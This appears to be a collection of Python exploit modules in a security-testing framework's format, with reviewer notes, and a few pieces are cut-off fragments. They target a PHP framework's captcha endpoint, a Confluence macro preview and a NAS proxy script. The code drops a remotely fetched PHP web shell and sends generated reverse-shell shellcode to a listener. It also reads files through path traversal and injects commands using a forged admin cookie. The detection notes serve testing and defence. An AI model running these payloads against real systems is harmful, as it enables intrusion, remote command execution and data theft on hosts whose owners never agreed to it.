def _attack(self):
    """Attack mode: make the target save a remote file as PHP, then confirm it runs.

    Two requests are sent. The first POSTs to ``/index.php?s=captcha`` with a
    ``_method=__construct`` / ``filter=assert`` body, so that the target
    evaluates a ``file_put_contents(file_get_contents(...))`` expression. The
    second POSTs ``c=phpinfo();`` to the newly named file and looks for the
    phpinfo marker text. The target product is not named in this listing.

    Returns:
        Whatever ``self.parse_output`` makes of the result dict; ``ShellInfo``
        is present only when the dropped file answered 200 with the marker.

    Review notes:
        * Nothing here removes the dropped file, so a positive run leaves a
          web-reachable ``.php`` file on the target that has to be recorded
          and cleaned up by whoever ran the test.
        * The dropped content is fetched by the target over plain HTTP from a
          third-party host and is not integrity-checked, so what actually
          gets written is whatever that host serves at the time.
        * Detection hook visible in this code: POSTs to
          ``/index.php?s=captcha`` whose body contains ``_method=__construct``.
    """
    findings = {}
    dropped_name = random_str(6) + ".php"
    remote_source = "http://pocsuite.org/include_files/php_attack.txt"
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}

    query = "/index.php?s=captcha&Test=print_r(file_put_contents(%27{filename}%27,file_get_contents(%27{url}%27)))".format(
        filename=dropped_name,
        url=remote_source)
    trigger_url = self.url + query
    body = "_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=print_r(file_put_contents(%27{filename}%27,file_get_contents(%27{url}%27)))".format(
        filename=dropped_name,
        url=remote_source
    )

    # Response of the trigger request is ignored; success is judged only by
    # the follow-up request to the dropped file.
    requests.post(trigger_url, data=body, headers=form_headers)
    probe = requests.post(self.url + "/" + dropped_name, data="c=phpinfo();", headers=form_headers)

    executed = probe.status_code == 200 and "PHP Extension Build" in probe.text
    if executed:
        findings['ShellInfo'] = {}
        findings['ShellInfo']['URL'] = self.url + "/" + dropped_name
        # 'Content' records the source URL, not the bytes that were written.
        findings['ShellInfo']['Content'] = remote_source
    return self.parse_output(findings)
# Fragment of a method body (its ``def`` line is not part of this listing).
# It POSTs each generated command to the same ``s=captcha`` endpoint with
# ``system`` as the filter. Responses are discarded, so nothing here confirms
# whether any command ran on the target.
vulurl = self.url + "/index.php?s=captcha"
form_headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}
# Generate the shellcode that writes a file
# NOTE(review): the helper is parameterised with the listener address and a
# Linux/x86 target; what each generated entry contains is not visible here.
commands = generate_shellcode_list(
    listener_ip=get_listener_ip(),
    listener_port=get_listener_port(),
    os_target=OS.LINUX,
    os_target_arch=OS_ARCH.X86,
)
for command in commands:
    form = {
        '_method': '__construct',
        'filter[]': 'system',
        'method': 'get',
        'server[REQUEST_METHOD]': command
    }
    requests.post(vulurl, data=form, headers=form_headers)
def _check(self, url):
    """Probe *url* for the ``s=captcha`` / ``_method=__construct`` behaviour.

    A fixed form body asking for ``phpinfo`` as the filter is POSTed to each
    candidate path. The target counts as affected when the phpinfo marker
    text appears in the response body; the status code is not consulted.

    Args:
        url: Base URL of the target; the candidate path is appended as-is.

    Returns:
        ``(path, body)`` for the first path whose response contains the
        marker, otherwise ``False``.

    Review note: this probe is non-destructive but still discloses full
    phpinfo output on an affected host. The request shape (path plus
    ``_method=__construct`` in the body) is what a WAF or log rule would
    match on.
    """
    marker = 'PHP Extension Build'
    body = "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
    candidate_paths = [
        r"/index.php?s=captcha"
    ]
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    for path in candidate_paths:
        resp = requests.post(url + path, data=body, headers=form_headers)
        if marker in resp.text:
            return path, body
    return False
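def _verify(self):
    """Verify mode: request a macro preview whose ``_template`` is ``../web.xml``.

    A ``widget`` macro preview is POSTed to ``/rest/tinymce/1/macro/preview``
    with the ``_template`` parameter pointing outside the template directory.
    If the response contains the expected evidence, up to ``limitSize``
    characters of it are stored under ``FileInfo``.

    Returns:
        Whatever ``self.parse_output`` makes of the result dict; ``FileInfo``
        is present only when non-empty evidence was found in a 200 response.
    """
    result = {}
    filename = "../web.xml"
    limitSize = 1000
    # NOTE(review): in this listing both evidence strings are empty. They
    # look like markup that was stripped when the page was rendered. With
    # empty strings the original test (`"" in r.text`, `re.search('', ...)`)
    # is true for every HTTP 200 response, so any reachable host would be
    # reported as affected. Restore both values from the upstream PoC; until
    # then the check below fails closed and reports nothing.
    marker = ""
    pattern = ''
    endpoint = self.url + "/rest/tinymce/1/macro/preview"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
        "Referer": self.url + "/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&",
        "Content-Type": "application/json; charset=utf-8"
    }
    data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
    r = requests.post(endpoint, data=data, headers=headers)
    if r.status_code == 200 and marker and marker in r.text:
        m = re.search(pattern, r.text)
        # Require a non-empty match so a finding is backed by observed content.
        if m and m.group():
            # Cap what is stored: the matched text is file content from the
            # target and may itself be sensitive.
            content = m.group()[:limitSize]
            result['FileInfo'] = {}
            result['FileInfo']['Filename'] = filename
            result['FileInfo']['Content'] = content
    return self.parse_output(result)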
"firstName": "77",
"lastName": "ss",
"password": "password",
"email": "77@qq.com",
"status": "active",
"roles": [
"$\\A" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
]
}
],
"type":"rpc","tid":4}
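# Fragment of a method body (the start of the method, including the request
# payload `j`, `target_url` and `result`, is outside this listing).
try:
    self.headers.update(self.auth())
    # The merged headers are deliberately not printed. Presumably
    # self.auth() returns credential material (confirm against its
    # definition); echoing it would put it into console output and logs.
    resp = req.post(target_url, json=j, headers=self.headers, proxies=self.proxies)
except Exception:
    # Python exceptions have no printStackTrace(); the original call raised
    # AttributeError inside the handler and hid the real error.
    import traceback
    traceback.print_exc()
    # No response was received, so there is nothing to test. The result is
    # returned unchanged, which means "inconclusive", not "not affected".
    return self.save_output(result)
if self.test_EL(resp):
    result['VerifyInfo'] = {}
    result['VerifyInfo']['URL'] = target_url
return self.save_output(result)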
def _shell(self):
    """Shell mode: send the operator-supplied ``command`` option to the target.

    A GET is issued to the ``network_mgr.cgi`` endpoint first. The command,
    wrapped as ``';<command>;'``, is then POSTed to ``/web/dsdk/DsdkProxy.php``
    with a client-set ``isAdmin=1;username=admin`` cookie. Both responses are
    discarded, so nothing here confirms whether the command ran.

    Review notes:
        * The only "credential" is a cookie value chosen by the client. A
          server that trusts it has no authentication on this path.
        * Detection hooks visible in this code: a request to
          ``network_mgr.cgi?cmd=cgi_get_ipv6&flag=1`` followed by a POST to
          ``DsdkProxy.php`` whose body starts with ``';``.
        * NOTE(review): ``logger.warn`` is the deprecated alias of
          ``warning`` if ``logger`` is a stdlib ``logging.Logger``. Confirm
          against the import.
    """
    ipv6_cgi = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
    proxy_php = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
    command = self.get_option("command")
    body = "';{};'".format(command)
    cookie_header = {'cookie': 'isAdmin=1;username=admin'}
    try:
        requests.get(ipv6_cgi)
        requests.post(proxy_php, data=body, headers=cookie_header)
    except Exception as e:
        # Best effort: transport errors are logged, never raised.
        logger.warn(str(e))